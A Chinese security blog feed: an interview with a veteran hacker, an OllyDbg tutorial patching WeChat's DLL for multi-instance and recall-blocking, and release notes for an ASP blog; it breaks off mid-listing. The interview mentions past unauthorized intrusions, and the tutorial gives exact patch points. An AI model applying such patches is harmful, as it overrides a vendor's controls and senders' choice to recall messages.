N

Nuclear'Atk(核攻击)网络安全实验室

Recent content on Nuclear'Atk(核攻击)网络安全实验室

专访黑客老兵核攻击:从零开始,以码为核【T00ls人物专访第十三期】

核攻击,一个在网络安全江湖中声名远扬的传奇人物,他仿佛是夜空中最亮的星,以卓越的才华和独特的魅力,照亮了整个网络安全的天空。他不仅是一位技术高超的黑客,更是一位深谙网络安全之道的智者。   作为网络安全领域的资深前辈,他在我的心中一直是一个高不可攀的存在。他的热情如同熊熊燃烧的火焰,照亮了周围每一个人;他的真诚和坦率,让人不由自主地被他吸引。他为人谦逊有礼,无论面对何种情况,都能保持一份从容和淡定,这种成熟和务实的态度,让他在同龄人中脱颖而出,成为众多人学习的榜样。   核攻击不仅在技术上有着深厚的造诣,更在网络安全的理论和实践中有着自己独到的见解。他能够轻松地在不同的角色之间切换,无论是作为技术专家、行业评论者还是社区的活跃分子,他都能展现出非凡的才华和魅力。   他的每一次出现,都仿佛是一场精彩的表演,让人目不暇接,深受启发。   他不仅在技术上追求卓越,更在网络安全的道德和法律边界上坚守原则。他的每一次行动,都体现了他对网络安全行业的深刻理解和对社会的责任感。他的故事和经历,激励着无数网络安全从业者不断前行,追求更高的目标。   核攻击,一个在网络安全领域中不可或缺的名字,他的传奇故事将永远激励着我们,让我们在网络安全的道路上不断探索和前行。 朋友看法   先来让我们看看朋友们对他的看法。   越南邻国宰相 做人做事认真严谨,行事低调,技术功底扎实,黑客圈骨灰级玩家   Any9aby 与核总早已相识,在接触不深时就已知他的一些传说,lcx.cc 的创始人,免杀大牛等等,作为业内活跃在技术前沿的前辈,通过一些人们早已熟知的技术手段可以创造出各种不同的新玩法,给我们提供很多思路,后来才发觉,核总不仅仅对技术保持热爱,同时还是一个充分热爱生活的人,骑车,摄影,都有涉及,总会跟我们说要对新鲜事务保持热爱,对于我来说,核总是一个很值得学习的榜样。   FrostsaberX 鸡哥是我见过最有人格魅力的人之一,作为上古时代过来的骨灰级老黑客,在和鸡哥合作的每次项目中任何问题和困难面前沉着冷静的默默承担团队大梁,手搓各种奇思巧技实现几乎不可能得绝地翻盘。技术栈广泛到怀疑人生行走的安全技术栈活字典,不管是基础设施的开发、项目和对外授课,还是无线电 IoT 都能和周围的人碰撞出不一样的火花灵感,而且热爱生活摄影烹饪顾家的十二边形大满贯全能战神。 采访话题   接下来让我们通过几个问题,了解核攻击的内心世界。   一、能否请您分享一下您是什么时候开始接触网络安全的?当时是出于什么契机或兴趣?   核攻击:那是,在快二十年前,大约 2007 年前后,那会儿刚刚小学毕业,从农村踏入县城,迈入初中时代。   也就是,在初一的微机课上,第一次亲手触摸到了以前只在黑白电视中看见过的计算机,当时仿佛有某种魔力一般,一瞬间就被电脑这种神奇的东西深深地吸引住了!从此便对它产生了浓厚的兴趣,一发不可收拾、无法自拔!   此后,就在课余的闲暇时间中翻阅各类书籍学习,课桌上的教科书 《信息技术》 已被翻烂,里边写满了各种笔记以及自己的心得体会,还在空白处手算二、八、十、十六进制互转,用作业本、草稿纸手写程序源代码,对!真正的 “写” 程序!   那时,每周最期待的事情就是上微机课,每次遇到新的问题、知识,就等着在下周的微机课上实践,当时一周只有一节课,有时还被其他老师以各种理由占了。   但是,仅是教科书的知识量还是太少,并不能满足当时强烈的好奇心和学习欲望,直到有一次放学路过街道上的报刊亭,想着有没有新出的《故事会》可以白嫖看看,偶然间瞅到了一本名叫 《黑客 X 档案》 的杂志,当时还不知道黑客是什么,只是看到封面和计算机知识有关,随后翻阅发现里边全是各种新奇的计算机技术,以及极客编程的奇技淫巧,于是一头扎进知识的海洋,逐行逐字看的如痴如醉,直到晚上打烊被老板赶走,心里还恋恋不舍。   也就是,那天,人生第一次被颠覆!原来计算机世界这么大!!!黑客技术竟可以拥有如此魔力!!!   从此,便打开了新世界的大门,一发不可收拾,用攒了很久的零花钱疯狂购买各种地摊杂志,那会儿最流行的是 《黑客 X 档案》、《黑客防线》、《黑客手册》、《大众电脑》 等,分周刊和月刊,还有年度合订本,每期必买,当时整条街就只有一个报刊亭有卖,每期还只有两三本,去迟了就没了!   之后,就更加 “走火入魔”,白天就在学校偷偷翻杂志,在里边做满了笔记,还把一些重要的知识点写在作业本、草稿纸上,死记硬背书里的 cmd 命令、编程源码语句(啊!对对对!背的比英语课单词还多~),然后等放学、放假再去网吧包夜机通宵实战……   在初中那个时期,整个人跟着魔一样,把每本书刊都翻了又翻,翻完杂志又去逛杂志官网论坛,自己没有电脑读取杂志附带的光盘内容,就去杂志官方论坛下载别人发布的光盘镜像,把书籍里那些软件玩的不亦乐乎,这些书籍持续陪伴我到高中时期,一直保留到现在。   这些书刊,对当时的我影响很大,积累了丰厚的基础知识,技术在一、两年之中突飞猛进,渐渐地在当地小有名气,还收了好几个徒弟,入侵过本地几乎所有网吧,然后这些网吧老板、网管都认得我了,去上网都跟防贼似的看着……   P.S.这里只是简略讲讲,更多当时的故事,各位读者可以参阅我博客 T00ls 十年前的采访文稿:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》   二、在您的网络安全生涯中,有没有自己编写过一些工具或开发过相关项目?能否分享一下这些经历?   核攻击:那是肯定的,每个真正的黑客都是编程高手,编写过的工具和项目非常多,数不胜数,从简单的 Exp 脚本、木马、远控、病毒、各类扫描器、钓鱼系统、溯源追踪、定位取证程序,到大型网站、集群控制系统、互联网级扫描测绘系统都有。   涉及的编程语言、开发环境,以及运行平台都非常多,有 Windows、Linux、Android、iOS、Arm 等各种平台,还有各种硬件、路由器固件什么的,有时候一个项目会使用多种编程语言、多种编程方案混合开发。   在后期的实战中,以对特定目标的针对性定制程序居多,根据当前已掌握的目标情况信息、网络构架,编写一次性定制化钓鱼、渗透、后门程序,这在 APT 高级渗透实战中很常见。   最早期,也是开发周期最久的一个系统,就是我的博客系统:Nuclear-Blog,从 2010 年起陆陆续续开发了很多年,十分简洁、高效、安全。   这个博客系统,起源也很有意思,大概在 2010 年前后,那会儿非常流行搭博客,当时我也想跟风搭建一个,但是找来找去,找不到一个安全、简洁、高效的博客程序,于是乎狠心下来自己从零开发一个,于是这套博客系统诞生了,后来命名为 Nuclear-Blog。   这套博客程序从零起步开发,并且全部代码接近于完全原创,经历了数年、无数次迭代更新,追求高度安全、稳定、简洁、高效,并且将性能优化到极限,从零手搓的动态缓存系统,以极低的性能要求满足海量访问需求,这需要大量时间和经验,同时也能深度磨练编程功力,极大地提升了个人编程水平,还能顺带学到了很多系统底层协议、知识,对个人综合技术水平提升起到了很大的帮助。   在那个时代,很流行 CC 攻击,当时博客出名了,就引来了一大堆攻击,而且市面上大部分 CDN、防火墙 对 CC 攻击防御效果不好,于是又手搓了一套反 CC 攻击模块插件:Anti-CC,自研的防御算法,单台服务器以极低的性能需求,即可彻底防御此类攻击,并且开源,可以轻松移植到其他系统。 对新人的建议:如果你有充足的精力和时间,强烈建议独立完成一个大型项目,在这个过程中,你将碰到并解决很多棘手的疑难问题,同时积累丰厚且宝贵的经验,这将使你的知识储备和综合能力达到一个新的高度。   三、您的学习渠道主要有哪些?在学习过程中,有没有哪些资源或平台对您帮助特别大?   核攻击:在早期,零几年,那会儿国内的网络安全行业,还正处于盘古开天地的初期阶段,鱼龙混杂、混乱不堪,没有任何体系化的学习渠道,那会儿,主要依靠各类杂志书籍、网络安全论坛,以及各类杂七杂八的动画教程网站,如 黑客动画吧、黑鹰网络、红客联盟 等,这些网站最多的内容就是 抓鸡、盗号 了,而且大部分教程都被捆绑了一堆木马,小菜看教程中马、感染病毒是日常的事。   在中期,经过几年的学习后,积累了很多基础知识,就进入 “自学阶段”,大部分问题都可以通过历史积累知识解决,只有在碰到难以解决的疑难杂症时,才会对这块的知识进行针对性学习,积累相关经验。   再后来,因为数年来积累了非常丰富的知识经验,几乎 99% 的问题都可以通过之前积累的丰富经验解决,此时会突然转变为 “创造模式”,会将之前积累的各种知识和经验揉碎、吸收再提取,总结为自己个人的一套方法、知识库,并不断优化,越用越顺手。   总的来说,在学习过程中,并没有哪些资源或某个平台帮助特别大,它们都具有相同的重要性、互相互补,如果非要选个帮助最大的,那一定是 T00ls.Net(土司)、WooYun.org(乌云网),因为原创性的知识非常多,并且讲解全面、自成体系,是早期为数不多的精华渠道。   除此之外,还有 Google.com,我认为: 自学是最重要的学习渠道和能力!   四、当时创建 lcx.cc 的起源是什么,为什么后面又关闭了?   核攻击:起源很简单,在 2010 年左右,国内博客网站非常流行、百花齐放,如 百度博客、网易博客、博客大巴 等,很久很久以前,曾短暂用过一段时间百度博客。   但是,因为百度监管太严、经常删文、自由度低,于是,萌生了自建博客的想法。   然后,找了一圈没有合适的博客程序,于是又立了个 Flag,决定自己从零开发一套,然后就一边分享自己学到的新知识,以及更新各类网络安全文章,同时一边开发和完善这套博客系统,这一搞就是十年多。 从某种程度上来讲,lcx.cc 可以看作是我早期学习、积累知识过程的一个缩影。   关于中途曾短暂关站,那是在 2016 年 7 月左右,受 “WooYun.org(乌云网)” 等国内严打事件影响,伟大的国家防火墙(GFW)屏蔽了一大批知名站点,其中包括本站在内。   这次屏蔽不是简单的国际出口屏蔽(可以翻墙访问),而是国际出口联合全国范围骨干网络线路拦截,屏蔽的非常彻底……   正好那段时间工作非常繁忙,暂时没空解决(也无法解决),就直接关站了,这一关就是一年多(中间很多朋友询问)。   直到 2017 年年底,偶然发现竟然解除屏蔽了!为了不让精心建设了六、七年的网站和大量高质量内容付之东流,于是抽时间重新整理了网站内容,并于 2018 年 9 月中旬重新上线。   而且这次还彻底变更了服务器基础网络构架,直接使用了 Github Pages 当服务器,又使用了 Cloudflare CDN 做加速,这些服务全部免费,且访问速度很快,只要域名不过期,网站基本永久安全稳定在线。   五、您如何看待当前网络安全行业的现状?您认为企业对网络安全的需求主要集中在哪些方面?   核攻击:   1、当前网络安全行业的现状   近年来,《网络安全法》《数据安全法》《个人信息保护法》等法律法规的出台,构建了网络安全领域的法律基础框架。   这一措施,使得极客分享精神不复存在,从之前的开放、共享,变为了小密圈、内部交流,以及知识付费平台的出现,使技术知识更加闭塞、垄断。   同时,网络攻击变得更加复杂、隐蔽和具有针对性,专业组织都转入地下,高度隐蔽。   高级持续性威胁(APT) 攻击频发,勒索软件攻击呈现产业化趋势,零日漏洞数量持续增加,安全防护难度不断加大。   传统的被动防御模式已难以应对,行业正在向 “主动免疫” 的智能防御范式转变。人工智能(AI) 技术初出茅庐,在威胁检测、安全运维、风险预测等环节的应用不断深化、快速发展。   2、企业对网络安全的需求   因某些特色原因,我国的网络安全 “名大于实”,企业更像是 “为了网络安全” 而去 “做网络安全”,一切都是生意。   例如 “护网、红蓝对抗、比赛演习”,这些本质上还是 “形式主义”,只是为了满足资质合规要求,或完成相关任务指标,如同将头埋在沙子中的鸵鸟。   目前,国内普通企业对网络安全的需求主要还是 “各种监管、资质合规、防加密勒索、防数据泄露” 等常规需求,除了重点军工机密单位,说白了就是业务稳定能跑就行。   云服务、微服务、轻量化容器的高速发展,使以前的开源、白盒挖洞,变成了全黑盒测试,门槛变得非常高,例如 “API、小程序、云沙盒逃逸、虚拟机/容器逃逸、认证/未授权/跨界/越权” 等云计算环境的渗透测试越来越多。   六、对于刚刚进入网络安全领域的新人,您有什么建议和忠告?   核攻击:   1、如果你是将网络安全作为一份日常谋生手段   那建议你多多摸鱼、勤拍马屁,早日混个管理职位,或者趁早直接跳槽转行,因为纯干安全技术打工是永远发不了财的!Yep~ -_-!!!   2、如果你是将网络安全作为一项重要兴趣爱好,并打算持续投入多年时间和精力。   那么强烈建议你多学习、多研究、多交流,疯狂积累知识和经验,打好坚实基础,强调实战、拒绝 “纸上谈兵”,尝试挑战自己独立完成各种大型项目,绝对令你受益匪浅。   而且一定要深度学习计算机底层知识,任何新技术都万变不离其宗,换来换去还是那一套(包括 AI 人工智能), 你只要吃透底层,就可以快速上手任何新技术,你只要精通一门编程语言,就可快速上手任何编程语言。 学会总结、记笔记,必要时随时复盘,构建自己的个人知识库,将之前积累的各种知识和经验揉碎、吸收再提取,总结为自己个人的一套方法、知识库,并不断优化,越用越顺手。 永远保持好奇心与解决问题的热情,兴趣才是你不断钻研、克服难题的核心驱动力!   七、您对网络安全行业的未来发展充满信心吗?您认为新人在这个领域有哪些机会和挑战?   核攻击: 人类正步入一个万物互联的时代,从智能穿戴、智能汽车到大型物联网,无数电子设备接入云端互联网,世界正在被代码重新编织,未来是网络技术的世界,也是网络安全的天下。 “黑客” 将会是这个世界真正的 “神仙、法师”,他们能以虚拟代码为武器,远程介入现实世界,方寸间即可 “洞悉万物”,游离时亦能 “执掌乾坤”,远程定点清除物理目标,是真正四两拨千斤的神级存在! 这种力量,早已不再是虚拟的传说,而是真实的战略威慑。 现在及未来战争,也将由网络安全主宰,几行代码,即可撼动一国,一个顶级黑客,完全有能力独自一人摧毁一个国家,这在现实世界中已多次证明。 从 “震网病毒” 穿透虚拟世界隔离、精准摧毁物理目标,到黑客干预美国大选,以及 “巴以冲突、俄乌战争”,现代战场早已超越枪炮硝烟,进入无声而致命的数字维度。 这些硝烟的背后,都是虚拟世界的数字战场、电子战争,真正的网络核攻击。 未来是一个属于守护者与破局者的时代,而你,我的朋友!是否准备成为下一个 “执键” 之人? 人物评价   核攻击,一位被同行誉为 “硬核极客” 的网络安全先驱,也是将自学精神、实战经验与技术理想深刻融合的典型代表。早年靠背命令、写代码、翻杂志 “徒手” 入门,却自驱成长为当地小有名气的 “黑客”。   他从初中课堂到网吧实战,再到独立开发博客系统,身份在漏洞挖掘者、工具开发者、知识分享者之间自然演进;不变的是对技术的纯粹热情、对知识的系统积累和对开源精神的坚持。   面对行业,他直言 “安全即合规” “形式主义盛行”;面对新人,他建议 “打好基础、独立做项目、吃透底层”。传奇背后,是一个把兴趣转化为实力、用代码构建自由的硬核样本。 下期预告   下期预计采访嘉宾为查鲁特,如想要了解他的技术生涯,请在论坛留言进行提问,小编将在论坛留言板筛选部分问题来进行采访。 后记(本人补充) 十年了,很荣幸再次接受国内老牌顶级黑客组织 T00ls 的人物专题采访。 这次人物专题访谈,对于我而言,不仅仅是一次对话与记录,更是一次对人生的深度梳理与总结。 它更像是一次与自我人生的对望,一次对过往的深刻审视,一次对未来的清晰锚定,它使我更坚定地勾勒远方,展望未来。 再次感谢 T00ls 平台,以及全体管理团队成员! 附录   本次采访稿内容原文在 2025年08月29日 发表于 T00ls 官网 和 官方微信公众号 等平台,相关网页链接如下: T00ls 官网:专访黑客老兵核攻击:从零开始,以码为核【T00ls人物专访第十三期】 T00ls 公众号:专访黑客老兵核攻击:从零开始,以码为核【T00ls人物专访第十三期】   同时附上 十年前上次采访的内容 (2015年12月10日),相关网页链接如下: 本站(lcx.cc):《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》 T00ls 官网:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》 T00ls 公众号:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》 Freebuf 官网:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》 Freebuf 公众号:《专访知名民间黑客 “核攻击”:在自己的道路上,谱写自己的传奇》

2025/8/29
articleCard.readMore

微信电脑版多开、防撤回(带撤回提示)破解方法

前言   网上有一堆微信电脑版多开、防撤回等破解补丁,可以实现类似的功能,但是微信是比较涉及个人隐私的社交软件,所以网上公开的补丁基本都不敢用,万一自带木马后门什么的就惨了。   泽东同志说得好:自己动手,丰衣足食!,所以核总在这里教大家纯手工修改方法。 准备工作   1. OllyDbg 或 OllyICE(OllyDbg 爱好者二次开发升级版本) 等反汇编软件。   2. 安装好微信电脑版,提取安装路径文件夹中的 WeChatWin.dll 备用。   使用 OllyDbg 纯手工修改微信电脑版 WeChatWin.dll 的汇编代码,实现无限多开和消息防撤回功能,并且有撤回提示。   该方法适用于微信电脑版(Windows PC 版)近几年的所有版本,甚至未来新版本。   有一定的技术门槛,需要了解基本的反汇编破解知识,如果不能熟练掌握 OllyDbg 等反汇编软件,那么底下内容就可以不用看了。 破解流程 1.解除多开限制   微信启动后,会先尝试创建互斥体,如果创建成功则直接启动微信,否则依次判断 WeChatMainWndForPC 和 WeChatLoginWndForPC 两个窗口是否存在,如果存在则使用 BringWindowToTop 函数将其置顶并弹出,如果不存在则启动微信。   上述两个窗口分别代表的是微信的主界面窗口和登陆界面窗口,如果一个微信实例已经存在,则势必处于这两种状态之一。   微信判断是否重复启动运行的条件:   1.如果互斥体创建成功,则直接启动微信。   2.如果互斥体创建失败,如果查找微信相关窗口,找到则置顶并退出,未找到则启动微信。   用伪代码表示一下判断逻辑: 1 2 3 4 5 6 7 8 9 10 11 // 尝试创建互斥体 if (CreateMutex() == SUCCESS) { // 创建成功则启动微信 } else { // 创建失败则尝试查找窗口 if (FindWindow() == SUCCESS) { // 找到微信窗口,则将已有窗口置顶,然后结束程序 } else { // 未找到微信窗口,则启动微信 } }   所以破解思路就很简单了,首先使用 OllyDbg 查找所有参考文本字符串:   WeChatMainWndForPC 或 WeChatLoginWndForPC   然后找到以下这段代码并修改(看右侧的注释说明,需要修改 1 处星标的行): 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 5B36F8B0 /$ E8 6B000000 call WeChatWi.5B36F920 创建互斥体 5B36F8B5 84C0 test al,al 判断互斥体是否创建成功 5B36F8B7 |. 74 56 je short WeChatWi.5B36F90F ★ je 改为 jmp,不管是否创建成功都强制跳转,并且跳过底下的窗口查找判断 5B36F8B9 |. 56 push esi 5B36F8BA |. 6A 00 push 0x0 ; /Title = NULL 5B36F8BC |. 68 2819105C push WeChatWi.5C101928 ; |Class = "WeChatMainWndForPC" 5B36F8C1 |. FF15 1CD8F15B call dword ptr ds:[<&USER32.FindWindowW>>; \FindWindowW 5B36F8C7 |. 8BF0 mov esi,eax ; WeChatWi.5A960000 5B36F8C9 |. 85F6 test esi,esi 5B36F8CB |. 75 12 jnz short WeChatWi.5B36F8DF > 如果找到窗口 WeChatMainWndForPC 则将该窗口切换到顶层然后退出(按理说修改这个字符串也可以实现绕过多开检测) 5B36F8CD |. 50 push eax ; /Title = "婍?" 5B36F8CE |. 68 9C0D105C push WeChatWi.5C100D9C ; |Class = "WeChatLoginWndForPC" 5B36F8D3 |. FF15 1CD8F15B call dword ptr ds:[<&USER32.FindWindowW>>; \FindWindowW 5B36F8D9 |. 8BF0 mov esi,eax ; WeChatWi.5A960000 5B36F8DB |. 85F6 test esi,esi 5B36F8DD |. 74 2B je short WeChatWi.5B36F90A > 如果找到窗口 微信:WeChatLoginWndForPC 则将该窗口切换到顶层然后退出(按理说修改这个字符串也可以实现绕过多开检测) 5B36F8DF |> 6A 01 push 0x1 5B36F8E1 |. 56 push esi 5B36F8E2 |. FF15 88D7F15B call dword ptr ds:[<&USER32.SwitchToThis>; user32.SwitchToThisWindow 以下代码为置顶已登录的窗口 5B36F8E8 |. 56 push esi ; /hWnd = 00000001 5B36F8E9 |. FF15 8CD7F15B call dword ptr ds:[<&USER32.BringWindowT>; \BringWindowToTop 5B36F8EF |. 6A 00 push 0x0 ; /pResult = NULL 5B36F8F1 |. 68 E8030000 push 0x3E8 ; |Timeout = 1000. ms 5B36F8F6 |. 6A 02 push 0x2 ; |Flags = SMTO_NORMAL|SMTO_ABORTIFHUNG 5B36F8F8 |. 6A 00 push 0x0 ; |lParam = 0x0 5B36F8FA |. 6A 00 push 0x0 ; |wParam = 0x0 5B36F8FC |. 68 E00B0000 push 0xBE0 ; |Message = MSG(0xBE0) 5B36F901 |. 56 push esi ; |hWnd = 00000001 5B36F902 |. FF15 74D9F15B call dword ptr ds:[<&USER32.SendMessageT>; \SendMessageTimeoutW 5B36F908 |. 85F6 test esi,esi 5B36F90A |> 0f95c0 setne al 5B36F90D |. 5E pop esi ; LoadDl_1.60001057 5B36F90E |. C3 retn 函数返回(有多开时) 5B36F90F |> 32C0 xor al,al 函数返回(没有多开时) 5B36F911 \. C3 retn 2.消息防撤回   消息防撤回,带对方撤回消息提示!   和上边一样,先查找所有参考文本字符串:pStrMsgid value is null   然后找到以下这段代码并修改(看右侧的注释说明,需要修改 1 处星标的行): 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 68E854DA |> \8B06 mov eax,dword ptr ds:[esi] 68E854DC |. 8BCE mov ecx,esi 68E854DE |. FF50 18 call dword ptr ds:[eax+0x18] 68E854E1 |. 85C0 test eax,eax ; WeChatWi.68B90000 68E854E3 |.^ 74 9D je short WeChatWi.68E85482 68E854E5 |. 68 F4C7336A push WeChatWi.6A33C7F4 ; ASCII "revokemsg" 68E854EA |. 8BC8 mov ecx,eax ; WeChatWi.68B90000 68E854EC |. E8 0F2F7700 call WeChatWi.695F8400 68E854F1 |. 8BF0 mov esi,eax ; WeChatWi.68B90000 68E854F3 |. 85F6 test esi,esi 68E854F5 |.^ 74 8B je short WeChatWi.68E85482 68E854F7 |. 68 F8D4336A push WeChatWi.6A33D4F8 ; ASCII "newmsgid" 68E854FC |. 8BCE mov ecx,esi 68E854FE |. E8 FD2E7700 call WeChatWi.695F8400 68E85503 |. 85C0 test eax,eax ; WeChatWi.68B90000 ★ 修改为 xor eax,eax 68E85505 |. 74 7B je short WeChatWi.68E85582 > PS:或者把 je 改为 jne 也可以?待测试! 68E85507 |. 8BC8 mov ecx,eax ; WeChatWi.68B90000 68E85509 |. E8 82377700 call WeChatWi.695F8C90 68E8550E |. 85C0 test eax,eax ; WeChatWi.68B90000 68E85510 |. 75 62 jnz short WeChatWi.68E85574 68E85512 |. 0F1005 98F52B>movups xmm0,dqword ptr ds:[0x6A2BF598] 68E85519 |. 83EC 10 sub esp,0x10 68E8551C |. BA C0C3336A mov edx,WeChatWi.6A33C3C0 ; ASCII "02_manager\ChatMgr.cpp" 68E85521 |. 8BC4 mov eax,esp 68E85523 |. B9 02000000 mov ecx,0x2 68E85528 |. 83EC 10 sub esp,0x10 68E8552B |. 0F1100 movups dqword ptr ds:[eax],xmm0 68E8552E |. 8BC4 mov eax,esp 68E85530 |. 83EC 10 sub esp,0x10 68E85533 |. 0F1100 movups dqword ptr ds:[eax],xmm0 68E85536 |. 8BC4 mov eax,esp 68E85538 |. 83EC 10 sub esp,0x10 68E8553B |. 0F1100 movups dqword ptr ds:[eax],xmm0 68E8553E |. 8BC4 mov eax,esp 68E85540 |. 83EC 10 sub esp,0x10 68E85543 |. 0F1100 movups dqword ptr ds:[eax],xmm0 68E85546 |. 8BC4 mov eax,esp 68E85548 |. 83EC 10 sub esp,0x10 68E8554B |. 0F1100 movups dqword ptr ds:[eax],xmm0 68E8554E |. 8BC4 mov eax,esp 68E85550 |. 68 E0D4336A push WeChatWi.6A33D4E0 ; ASCII "pStrMsgid value is null" 68E85555 |. 68 F8C3336A push WeChatWi.6A33C3F8 ; ASCII "ChatMgr" 68E8555A |. 68 C4D4336A push WeChatWi.6A33D4C4 ; ASCII "ChatMgr::parseRevokeContent" 68E8555F |. 68 8B080000 push 0x88B 68E85564 |. 0F1100 movups dqword ptr ds:[eax],xmm0 68E85567 |. E8 54732900 call WeChatWi.6911C8C0 68E8556C |. 83C4 70 add esp,0x70 68E8556F |.^ E9 0EFFFFFF jmp WeChatWi.68E85482 3.破解完成   复制所有修改并保存到文件,然后替换 WeChatWin.dll 原文件,重新运行微信即可。 下载地址   不提供任何破解文件下载,免得腾讯律师函警告。 参考资料   微信PC端多开的秘密   微信PC段防撤回DLL(WeChatWin.dll)修改测试   深扒微信多开的秘密后,我竟然发现了个 bug   微信 最新 电脑版 绿色修改版,和官方同步更新,有现成破解补丁下载,安全性自测!   微信 最新 电脑版 正式版+测试版+开发版(多开+防撤回,带撤回提示),和官方同步更新,有现成破解补丁下载,安全性自测!

2021/4/26
articleCard.readMore

Nuclear-Blog v7.2 博客系统 最终版 开源下载

前言   大概在 2010 年前后,那会儿非常流行搭博客,核总本人也想搭一个,但是找来找去,找不到一个安全、简洁、高效的博客程序,于是乎狠心下来自己从零开发一个,于是这套博客系统诞生了,后来命名为 Nuclear-Blog。   说起来从零开发博客,并且全部代码接近于完全原创,国内做到的人估计屈指可数,一是需要大量时间和经验,二是需要极高的编程功力,只是这两点就足以令 99% 的人望而却步,所以大多数人只是拿个开源的博客二次开发一下、换个皮、改个模板玩玩。   从 2010 年到 2015 年,这套博客程序经历了无数次迭代更新,再加上核总从骨子里追求精益求精、登峰造极,所以这 5 年时间里已经将该系统打磨的极其安全、稳定、简洁、高效了,同时也极大地提升了个人编程水平,并且顺带学到了很多底层协议、知识,对以后的个人综合技术水平提升起到了很大的帮助。   那么,有细心的读者发现了,为何 2015 年后没有更新了呢?   原因很简单,该有的功能都有了,不该有的功能也加了,一个博客系统已无限接近于成熟和完美,所以后边更新的频率越来越低,因为没啥可更新的了,哈哈哈……   历史上也开源过几次,版本列表如下: Nuclear-Blog v4.0 Nuclear-Blog v5.0 Nuclear-Blog v5.0 Nuclear-Blog v6.0   后来到了 2018 年,由于 Asp 无法跨平台,试了很多方案无解,同时 PHP 已充斥了整个行业,Asp 生存空间越来越小(过时但永不淘汰),再加上个人精力有限,最终放弃了继续开发。   遂于 2018 年中旬抽时间整理了之前的内容,并彻底更换网站系统为 Caddy + Hugo 跨平台完美组合,于 2018 年 9 月中旬重新上线。   随着时代的变迁,从最开始的博客,接下来轻博客,到现在的微博,大家越来越不喜欢臃肿的长文章,更喜欢短小精悍的碎片信息,这年头还坚持写博客的人,已经寥寥无几了。   再后来,有很多朋友喜欢这套博客程序,原因是很简洁而且相当安全,于是在众多朋友频繁催更之下,抽时间整理了最终版的源码,现发布出来。   目前版本是 Nuclear-Blog v7.2,也是最终版本,以下是使用说明和相关功能介绍。 快速使用   1、下载 Nuclear-Blog v7.2 压缩包并解压。   2、在文件 \admin\Index.asp 中修改后台登陆账号和密码,默认 admin:123456。   3、将后台管理主目录 /admin/ 修改为其他人猜不到的名字。   4、在 /inc/conn.asp 中将数据库名字修改为其他人猜不到的,别忘了将两个对应的 .mdb 文件也改名。   5、上传所有文件到你的 Windows 服务器或者支持 Asp 的虚拟主机、空间,如有必要,请参考“初始化设置”对服务器进行相关调整。   6、访问后台,修改一下网站名称之类的基本参数,添加一点内容,Enjoin!   操作过程中如果有疑问或者报错,请参考底下的手册。   本系统已经十分安全,强迫症患者可以参考底下设置一下相关权限。 文件结构   本博客系统的文件结构简洁、逻辑清晰,每个文件中都有详细的代码说明和注释,以供二次开发或者修改代码所参考,具体结构如下: 路径 说明     \后台密码加密算法\ 加密算法,用于生成 \admin\Index.asp 中后台登陆账号和密码的密文,独立运行,可以删除。     \favicon.ico 浏览器地址栏的小图标,也用于收藏夹,非必须的,看个人喜好更换或删除。 \404.asp 自定义的 404 错误页面。 \file.asp 所有的附件、图片、文件处理程序,主要功能是提取数据库中的文件,缓存并输出。 \index.asp 核心文件,所有的首页、文章、列表、内容处理程序。     \admin\ 后台相关文件,该目录名可以随意改名,最好修改成别人猜不到的。 \admin\Index.asp 后台登陆账号和密码在这里改,配合上边的算法使用,默认账号和密码 admin:123456。     \cache\ 所有页面、文件、图片的缓存,访问会自动生成,可以随时手动删除或在后台清空,程序会在你修改数据的时候自动更新缓存,核心代码全自动的,基本不用管。     \image\ 所有的模板文件、图片、CSS、JS 等静态资源存放路径。 \image\Content.html 内容页面模板。 \image\Index.html 首页模板。 \image\List.html 列表模板。 \image\LiuYan.html 留言板模板。 \image\face\ 留言板的默认头像。 \image\KindEditor\ KindEditor 编辑器,用的纯静态版,不用担心任何漏洞。     \inc\0b1214c54b5a59d3_data.mdb 存放文章、浏览、系统设置的数据库,建议名字改成别人猜不到的,以防非法下载,造成数据泄露。 \inc\0b1214c54b5a59d3_file.mdb 存放附件、图片等文件二进制数据的数据库,建议名字改成别人猜不到的,以防非法下载,造成数据泄露。     \inc\MD5.asp MD5 算法。 \inc\Conn.asp 数据库链接配置和一些公共函数,如果修改了数据库名字,记得在这里也改一下。 \inc\Anti-CC_CDN.asp 早年写的一个高效防 CC 攻击模块(支持 CDN,也可以防路径扫描、恶意采集和暴力破解),具体参考Asp 防御CC攻击模块 (Anti-CC.asp)     \liuyan\index.asp 留言板。 \liuyan\liuyan.asp 留言板,提交留言。     \music\ 一个在线音乐视频播放器,主要用于在文章中插入多媒体文件。 安全设置   如果你在 \admin\Index.asp 中添加:   <!--#include file="Inc/Anti-CC_CDN.asp"-->   还能天然免疫暴力破解登陆密码攻击,退一万步讲,即使有后台权限也拿不到 webshell,最多删删文章、改改首页意淫下罢了(所以建议多备份)。   XSS 之类的就更不用担心了,不存在任何 XSS 漏洞(欢迎各种代码审计)。   如你用的 CDN 的话,所有访客 IP 地址是通过 HTTP_X_FORWARDED_FOR 获取的,但是不用担心,该函数已进行安全处理。   为了安全起见,建议设置一下文件访问权限,其实不设置也不要紧,这套系统从正面无人能入侵(再次欢迎各种代码审计),建议的文件访问权限设置如下: 路径 权限     \cache\ 及子目录 可读可写,禁止执行     \inc\ 可读可写(主要是为了能修改 mdb 数据库) \inc\*.asp 只读,不可写     其余所有目录、文件及子目录 只读,不可写 数据备份   Nuclear-Blog v7.2 博客系统备份十分简单方便,只需要打包一下除 \cache\ 目录之外的所有文件即可。   建议首次打包备份后,以后只需要单独打包一下 \inc\ 目录下的两个 mdb 数据库即可,以减少传输数据量。   众所周知,三处离线灾备是基本原则。 依赖组件   网站留言版是可以设置有新留言自动发送邮件提醒的,具体设置见后台,该功能需要依赖 JMail 发送邮件组件,下载地址见底下。   也有无组件发送邮件的方法,你可以自己改改,但效果不太好,因为是公共地址发送,各种被滥用,容易进垃圾箱(100%),相关代码如下: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 